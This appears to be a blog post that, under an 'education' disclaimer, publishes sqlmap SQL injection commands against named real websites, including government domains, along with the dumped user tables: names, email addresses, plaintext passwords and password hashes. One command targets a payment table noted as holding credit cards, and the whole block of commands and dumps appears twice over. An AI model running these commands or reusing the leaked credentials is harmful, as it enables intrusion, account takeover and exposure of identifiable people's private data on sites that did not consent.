As always this information is for education purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the compromises. Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,
The exploit is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act.
Database: ansol_ansol
Table: usuarios
[1 entry]
+------+---------------+-------+
| id_u | pw | us |
+------+---------------+-------+
| 1 | 234asgdasdf5$ | ansol |
+------+---------------+-------+
root@okys:/home/okys/sqlmap-dev# ./sqlmap.py -u"http://ansol.com.ar/noticia.php?id=2092" --dump -Tusuarios -Dansol_ansol
Database: serviciosesen
Table: admin
[2 entries]
+----+---------+-------+--------------------------------------------+------------+
| id | mail | user | pass | sesion |
+----+---------+-------+--------------------------------------------+------------+
| 1 | <blank> | admin | 177dacb14b34103960ec27ba29bd686b (alberto) | root |
| 2 | <blank> | admin | e768332833c6e239724c3e7252428859 | seContable |
+----+---------+-------+--------------------------------------------+------------+
./sqlmap.py -u"http://www.serviciosesenciales.com.ar/libro.php?id=241" --dump -Tadmin -Dserviciosesen
The variable [cod] from [http://www.barbalha.ce.gov.br/v2/index.php?pg=secretaria&cod=25] is vulnerable to SQL Injection [Comment without quotes - MySQL].
Database: barbalha_port
Table: usuarios
[2 entries]
+----+--------------------+------------------+-----------+-----------------------+
| id | nome | senha | login | email |
+----+--------------------+------------------+-----------+-----------------------+
| 10 | Jean Elvis | a2diZTE3I0Ak | jeanelvis | jeanelvis@hotmail.com |
| 12 | BadBoy de Barbalha | YmFyMTIzNGxocw== | badboy | <blank> |
+----+--------------------+------------------+-----------+-----------------------+
The variable [partner] from [https://www.internationalcheckout.com/coupon.php?partner=225] is vulnerable to SQL Injection [Comment without quotes - MySQL].
The variable [newsId] from [https://www.internationalcheckout.com/newsdetail.php?newsId=274] is vulnerable to SQL Injection [Comment with quotes - MySQL].
+----------+-----------+--------------+----------------+
| admin_id | admin_pwd | admin_status | admin_username |
+----------+-----------+--------------+----------------+
| 1 | admin | 1 | admin |
+----------+-----------+--------------+----------------+
./sqlmap.py -u"http://aviatour.travel/index.php?module=member&action=registration" --dump -Cemail,user_name,user_password -Tuser -Dvinnocrm-avia
Database: `vinnocrm-avia`
Table: user
[20 entries]
+---------+---------------+-------------------------------------------+
| email | user_name | user_password |
+---------+---------------+-------------------------------------------+
| <blank> | admin | d357c72ac91ea3b037a71794409b7657 |
| <blank> | Elni | 24c79a666ccf901215fb860fadb23fc7 |
| <blank> | ali | 3861a60523ef89a017be166c5b325409 (aliali) |
| <blank> | amel | 9968071885dbeb623c4959bd5e28eb88 |
| <blank> | reza | ad40886c39edf4c61fed576f62720916 |
| <blank> | vanwellistest | 202cb962ac59075b964b07152d234b70 (123) |
| <blank> | febri | 2af48c517dc56df5f8fb5627613244cc |
| <blank> | nova | 6fb06bad5700269790406a00decce7ac |
| <blank> | yenny | 0afd7d657f177e8a072a53b2b626c394 (yenny) |
| <blank> | william | b2a20172c22b65cccac87d056d1a5208 |
| <blank> | hotelpackage | f3510c5f2ca917f0f0393f1b7125cbd4 |
| <blank> | document | 9c691c38b0c2fb9745e7facd2290f6e7 |
| <blank> | mgr_ticketing | 780db82a764efbe0704ee3e075ef3d21 |
| <blank> | ticketing2 | 775cd0b05dd50f2be57219d705d97fa2 |
| <blank> | ticketing1 | edf8e743c2b2666d2101eeacd4195dc9 |
| <blank> | tour | e9d2b2a1635f2a3bc1fff72dfdfda928 |
| <blank> | Package | 0bdd5dc6e318027d22eff4e07f8efcc6 |
| <blank> | management | c4ca4238a0b923820dcc509a6f75849b (1) |
| <blank> | socialmedia | 81fcbb913dc1682958f127a85de6ccbf |
| <blank> | tourop | 22d4200187a20b64c7e27d45a071f464 |
+---------+---------------+-------------------------------------------+
+--------+-----------+-----------+------------+------------------------------------+-------------+---------------+------------------+
| UserID | User_Pass | User_Name | UserStatus | User_Email | basic_price | percent_price | free_order_price |
+--------+-----------+-----------+------------+------------------------------------+-------------+---------------+------------------+
| 1 | admin | admin | 0 | vinylbannerstore@trianglerepro.com | 1.99 | 5.00 | 150.00 |
+--------+-----------+-----------+------------+------------------------------------+-------------+---------------+------------------+
[19:03:45] [INFO] table 'vbs.tbl_admin_login' dumped to CSV file '/home/okys/sqlmap-dev/output/www.vinyl-banners-store.com/dump/vbs/tbl_admin_login.csv'
[19:03:45] [INFO] fetched data logged to text files under '/home/okys/sqlmap-dev/output/www.vinyl-banners-store.com'
Database: zerecord_main
Table: user
[1 entry]
+----+--------+--------------------+--------+------------+------------+
| id | login | email | passwd | lastname | firstname |
+----+--------+--------------------+--------+------------+------------+
| 1 | michel | shop@zerecords.com | 190608 | ZE Records | ZE Records |
+----+--------+--------------------+--------+------------+------------+
[19:03:35] [INFO] table 'zerecord_main.user' dumped to CSV file '/home/okys/sqlmap-dev/output/www.zerecords.com/dump/zerecord_main/user.csv'
[19:03:35] [INFO] fetched data logged to text files under '/home/okys/sqlmap-dev/output/www.zerecords.com'
Database: edcoengineering
Table: users
[9 entries]
+--------+-----------+-------------------------------+---------------+
| logins | user_name | user_email | user_password |
+--------+-----------+-------------------------------+---------------+
| 0 | admin | s.lopes@totalsupport.com | rihrih |
| 0 | hoekro | rob@edco.ch | rihrihrih |
| 0 | martin | martin.hornig@edco.ch | albula2 |
| 0 | schrro | r.schroter@totalsupport.nl | robschroter |
| 0 | luc | luc@edco.ch | edcolucedco |
| 0 | veroli | mark@veroli.co.uk | markedcomark |
| 0 | carlos | carlos@prolightcomponents.com | hejonge |
| 0 | joost | joost@edco.ch | uden2012 |
| 5 | tsadmin | contact@totalsupport.com | admin |
+--------+-----------+-------------------------------+---------------+
[18:48:12] [INFO] table 'edcoengineering.users' dumped to CSV file '/home/okys/sqlmap-dev/output/www.edcoengineering.nl/dump/edcoengineering/users.csv'
[18:48:12] [INFO] fetched data logged to text files under '/home/okys/sqlmap-dev/output/www.edcoengineering.nl'
Database: intranet
Table: joo_users
[3 entries]
+----------------------+--------------------------------------+----------------+------------+-------------------------------------------------------------------+
| name | email | username | usertype | password |
+----------------------+--------------------------------------+----------------+------------+-------------------------------------------------------------------+
| maria veronica arana | veronica.arana@bariloche.inta.gov.ar | veronica.arana | <blank> | 978adce457c616e4017be5d7d2451ac5:J0v2Jts3WlENkELYMUnM1b8dvsZi9u1v |
| Sonia Mabel Garcia | sgarcia@bariloche.inta.gov.ar | sgarcia | <blank> | 80e411f46e0bc1bf4ee1ba668f5ec4de:PPUW7CUSyZ6h5bLDNcv7vdmjbdly46r6 |
| Super User | plagorio@bariloche.inta.gov.ar | admin | deprecated | e84a2e3ed4bec4f8b81520e6a5bd3bcf:2ueqTZjUYgrGl64UuPAgQC0nHRnyCcge |
+----------------------+--------------------------------------+----------------+------------+-------------------------------------------------------------------+
sqlmap.py -u"http://sipan.inta.gov.ar/index.php?url=aXZuL2luZGljZV9kZXRhbGxlLnBocA==&idpoligono=5&mes=7&anio=2028" --dump -Cemail,name,password,username,usertype -Tjoo_users -D intranet
+---------+----------------------------------+
| login | password |
+---------+----------------------------------+
| alberto | 26dceee339cb96da2d3f81ab00f39490 |
| miguel | ab7d9d81541cd0d70e8e8d670eee512d |
| pablo | 6d92bf19c4b525ead8557415ec241f7c |
| root | 36c1c60e8dc1bff0c7823a2e0cb3fd11 |
+---------+----------------------------------+
./sqlmap.py -u"https://www.banduawargames.com/categoria.php?id=0" --dump -Clogin,password -Tadministradores -Dwargamesbandua_web
tiene cc
./sqlmap.py -u"https://www.worldtibe.com/en/specialist/detail.php?id=2&c=141&p=1" -p "id" --column -TOrdersPayment -Dorientta_DB
./sqlmap.py -u"http://www.artofliving.org/za-en/public-programs?scenter=8279" -p "scenter" --table -Dgwebdb_global
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
The exploit is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act.
Database: ansol_ansol
Table: usuarios
[1 entry]
+------+---------------+-------+
| id_u | pw | us |
+------+---------------+-------+
| 1 | 234asgdasdf5$ | ansol |
+------+---------------+-------+
root@okys:/home/okys/sqlmap-dev# ./sqlmap.py -u"http://ansol.com.ar/noticia.php?id=2092" --dump -Tusuarios -Dansol_ansol
Database: serviciosesen
Table: admin
[2 entries]
+----+---------+-------+--------------------------------------------+------------+
| id | mail | user | pass | sesion |
+----+---------+-------+--------------------------------------------+------------+
| 1 | <blank> | admin | 177dacb14b34103960ec27ba29bd686b (alberto) | root |
| 2 | <blank> | admin | e768332833c6e239724c3e7252428859 | seContable |
+----+---------+-------+--------------------------------------------+------------+
./sqlmap.py -u"http://www.serviciosesenciales.com.ar/libro.php?id=241" --dump -Tadmin -Dserviciosesen
The variable [cod] from [http://www.barbalha.ce.gov.br/v2/index.php?pg=secretaria&cod=25] is vulnerable to SQL Injection [Comment without quotes - MySQL].
Database: barbalha_port
Table: usuarios
[2 entries]
+----+--------------------+------------------+-----------+-----------------------+
| id | nome | senha | login | email |
+----+--------------------+------------------+-----------+-----------------------+
| 10 | Jean Elvis | a2diZTE3I0Ak | jeanelvis | jeanelvis@hotmail.com |
| 12 | BadBoy de Barbalha | YmFyMTIzNGxocw== | badboy | <blank> |
+----+--------------------+------------------+-----------+-----------------------+
The variable [partner] from [https://www.internationalcheckout.com/coupon.php?partner=225] is vulnerable to SQL Injection [Comment without quotes - MySQL].
The variable [newsId] from [https://www.internationalcheckout.com/newsdetail.php?newsId=274] is vulnerable to SQL Injection [Comment with quotes - MySQL].
+----------+-----------+--------------+----------------+
| admin_id | admin_pwd | admin_status | admin_username |
+----------+-----------+--------------+----------------+
| 1 | admin | 1 | admin |
+----------+-----------+--------------+----------------+
./sqlmap.py -u"http://aviatour.travel/index.php?module=member&action=registration" --dump -Cemail,user_name,user_password -Tuser -Dvinnocrm-avia
Database: `vinnocrm-avia`
Table: user
[20 entries]
+---------+---------------+-------------------------------------------+
| email | user_name | user_password |
+---------+---------------+-------------------------------------------+
| <blank> | admin | d357c72ac91ea3b037a71794409b7657 |
| <blank> | Elni | 24c79a666ccf901215fb860fadb23fc7 |
| <blank> | ali | 3861a60523ef89a017be166c5b325409 (aliali) |
| <blank> | amel | 9968071885dbeb623c4959bd5e28eb88 |
| <blank> | reza | ad40886c39edf4c61fed576f62720916 |
| <blank> | vanwellistest | 202cb962ac59075b964b07152d234b70 (123) |
| <blank> | febri | 2af48c517dc56df5f8fb5627613244cc |
| <blank> | nova | 6fb06bad5700269790406a00decce7ac |
| <blank> | yenny | 0afd7d657f177e8a072a53b2b626c394 (yenny) |
| <blank> | william | b2a20172c22b65cccac87d056d1a5208 |
| <blank> | hotelpackage | f3510c5f2ca917f0f0393f1b7125cbd4 |
| <blank> | document | 9c691c38b0c2fb9745e7facd2290f6e7 |
| <blank> | mgr_ticketing | 780db82a764efbe0704ee3e075ef3d21 |
| <blank> | ticketing2 | 775cd0b05dd50f2be57219d705d97fa2 |
| <blank> | ticketing1 | edf8e743c2b2666d2101eeacd4195dc9 |
| <blank> | tour | e9d2b2a1635f2a3bc1fff72dfdfda928 |
| <blank> | Package | 0bdd5dc6e318027d22eff4e07f8efcc6 |
| <blank> | management | c4ca4238a0b923820dcc509a6f75849b (1) |
| <blank> | socialmedia | 81fcbb913dc1682958f127a85de6ccbf |
| <blank> | tourop | 22d4200187a20b64c7e27d45a071f464 |
+---------+---------------+-------------------------------------------+
+--------+-----------+-----------+------------+------------------------------------+-------------+---------------+------------------+
| UserID | User_Pass | User_Name | UserStatus | User_Email | basic_price | percent_price | free_order_price |
+--------+-----------+-----------+------------+------------------------------------+-------------+---------------+------------------+
| 1 | admin | admin | 0 | vinylbannerstore@trianglerepro.com | 1.99 | 5.00 | 150.00 |
+--------+-----------+-----------+------------+------------------------------------+-------------+---------------+------------------+
[19:03:45] [INFO] table 'vbs.tbl_admin_login' dumped to CSV file '/home/okys/sqlmap-dev/output/www.vinyl-banners-store.com/dump/vbs/tbl_admin_login.csv'
[19:03:45] [INFO] fetched data logged to text files under '/home/okys/sqlmap-dev/output/www.vinyl-banners-store.com'
Database: zerecord_main
Table: user
[1 entry]
+----+--------+--------------------+--------+------------+------------+
| id | login | email | passwd | lastname | firstname |
+----+--------+--------------------+--------+------------+------------+
| 1 | michel | shop@zerecords.com | 190608 | ZE Records | ZE Records |
+----+--------+--------------------+--------+------------+------------+
[19:03:35] [INFO] table 'zerecord_main.user' dumped to CSV file '/home/okys/sqlmap-dev/output/www.zerecords.com/dump/zerecord_main/user.csv'
[19:03:35] [INFO] fetched data logged to text files under '/home/okys/sqlmap-dev/output/www.zerecords.com'
Database: edcoengineering
Table: users
[9 entries]
+--------+-----------+-------------------------------+---------------+
| logins | user_name | user_email | user_password |
+--------+-----------+-------------------------------+---------------+
| 0 | admin | s.lopes@totalsupport.com | rihrih |
| 0 | hoekro | rob@edco.ch | rihrihrih |
| 0 | martin | martin.hornig@edco.ch | albula2 |
| 0 | schrro | r.schroter@totalsupport.nl | robschroter |
| 0 | luc | luc@edco.ch | edcolucedco |
| 0 | veroli | mark@veroli.co.uk | markedcomark |
| 0 | carlos | carlos@prolightcomponents.com | hejonge |
| 0 | joost | joost@edco.ch | uden2012 |
| 5 | tsadmin | contact@totalsupport.com | admin |
+--------+-----------+-------------------------------+---------------+
[18:48:12] [INFO] table 'edcoengineering.users' dumped to CSV file '/home/okys/sqlmap-dev/output/www.edcoengineering.nl/dump/edcoengineering/users.csv'
[18:48:12] [INFO] fetched data logged to text files under '/home/okys/sqlmap-dev/output/www.edcoengineering.nl'
Database: intranet
Table: joo_users
[3 entries]
+----------------------+--------------------------------------+----------------+------------+-------------------------------------------------------------------+
| name | email | username | usertype | password |
+----------------------+--------------------------------------+----------------+------------+-------------------------------------------------------------------+
| maria veronica arana | veronica.arana@bariloche.inta.gov.ar | veronica.arana | <blank> | 978adce457c616e4017be5d7d2451ac5:J0v2Jts3WlENkELYMUnM1b8dvsZi9u1v |
| Sonia Mabel Garcia | sgarcia@bariloche.inta.gov.ar | sgarcia | <blank> | 80e411f46e0bc1bf4ee1ba668f5ec4de:PPUW7CUSyZ6h5bLDNcv7vdmjbdly46r6 |
| Super User | plagorio@bariloche.inta.gov.ar | admin | deprecated | e84a2e3ed4bec4f8b81520e6a5bd3bcf:2ueqTZjUYgrGl64UuPAgQC0nHRnyCcge |
+----------------------+--------------------------------------+----------------+------------+-------------------------------------------------------------------+
sqlmap.py -u"http://sipan.inta.gov.ar/index.php?url=aXZuL2luZGljZV9kZXRhbGxlLnBocA==&idpoligono=5&mes=7&anio=2028" --dump -Cemail,name,password,username,usertype -Tjoo_users -D intranet
+---------+----------------------------------+
| login | password |
+---------+----------------------------------+
| alberto | 26dceee339cb96da2d3f81ab00f39490 |
| miguel | ab7d9d81541cd0d70e8e8d670eee512d |
| pablo | 6d92bf19c4b525ead8557415ec241f7c |
| root | 36c1c60e8dc1bff0c7823a2e0cb3fd11 |
+---------+----------------------------------+
./sqlmap.py -u"https://www.banduawargames.com/categoria.php?id=0" --dump -Clogin,password -Tadministradores -Dwargamesbandua_web
tiene cc
./sqlmap.py -u"https://www.worldtibe.com/en/specialist/detail.php?id=2&c=141&p=1" -p "id" --column -TOrdersPayment -Dorientta_DB
./sqlmap.py -u"http://www.artofliving.org/za-en/public-programs?scenter=8279" -p "scenter" --table -Dgwebdb_global
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information